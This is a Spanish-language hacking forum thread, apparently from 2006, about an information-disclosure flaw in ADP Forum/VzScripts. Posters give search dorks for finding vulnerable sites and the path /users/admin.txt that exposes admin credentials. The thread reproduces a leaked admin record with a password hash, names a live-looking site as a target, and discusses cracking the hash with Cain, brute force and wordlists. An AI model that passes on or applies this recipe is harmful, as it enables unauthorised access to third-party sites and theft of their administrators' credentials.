HackPR.NET

En realidad no existe algo mas facil  que esto.

Esto es lo que nos dara un foro vulnerable al ejecutar de la siguiente manera este codigo.En foros Dork:ADP Forum 2.0.3 is powered by VzScripts

http:/[target]/[path]/users/admin.txt

Quoteadmin
Master Member
115
images/avatars/1120150756.gif
http://www..com
9368439
30-06-2005
Admin
6c41745bbdf353a134a3d8207eb82ea4
1120150756

 ;D

Pobres de los que usen ese foro, esta muy inocente el error

Ala verdad que el que hizo ese Script es bien inteligente!

recomendado para los que despues no saben que hacer cuando los amenazan los administradores

Quote from: Ҝ٥m‬┬≡ζ1 on December 31, 2006, 10:52:14 PM
avisar a los admin...
Komtec1

Quote from: ElecBoy on December 31, 2006, 11:43:13 PM
Ala verdad que el que hizo ese Script es bien inteligente!

Inteligente? :P

Creo que esto ya supero todas mis espectativas de lo que es FACIL :P

Ya es demasiado... increible que aun exista gente con sistemas tan vulnerables

Quotehttp:/[target]/[path]/users/admin.txt

Oye bro, no entiendo que es lo que tiene que ir en eso de target  ni el path, que es lo que se debe de poner ahí o que,, dame un ejemplo para darme una idea bro , si me pudieras hacer el favor bro  ;)

Quoteadmin
Master Member
115
images/avatars/1120150756.gif
http://www..com
9368439
30-06-2005
Admin
6c41745bbdf353a134a3d8207eb82ea4
1120150756

Y de esto que pusiste explicame un poco mas para entender mas bien de esta vulnerabilidad bro.

Deverias aprender cositas basicas men, como lo  que significa un target. Pero como yo tampoco lo sabiar y me lo digeron pues aqui tienes con un site vul..

target= direccion url de la web.
path= modulo    /foro/    o   /buscador/  etc.....

http:/[target]/[path]/users/admin.txt

http://pagina/modulovulnerqble//users/admin.txt



http://www.mejorambiente.com.mx/foro/

 :D jejej, gracias bro, la verdad y si tienes razón pero ese día ya después me explicó Komtec1, e incluso ví que también se les puede hacer algo a los foros que nada mas tengas powered by VzScrtip sin necesidad de que sean de ADP  ;D , ya que yo lo hice en uno de VzScript sin ADP y no se veía ningún post  ;D ... muchas gracias por tu ayuda bro .......

.y Gracias Komtec1...

Muy bueno.... a probar :D :D :D

Estube investigando un poco... aparentemente todos los d0rks son estos:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

y ese hash en que esta encriptado? md5? :S no pude crackearlo en milw0rm (ninguno de las 6 o 7 webs vulnerables que encontre...)

Por ahi no lo encuentra milw0rm... porque no provas con un crack manual? a brute force puede funcionar

probe con el cain... y tampoco lo saco... tarde dos dias xD (no queria consumir mucha memoria).

A BrutoForce para mi que es algo mmmm impaciente, usate estos wordlist, talvez te funcione..

ftp://ftp.ox.ac.uk/pub/wordlists/

gracias..... probando.....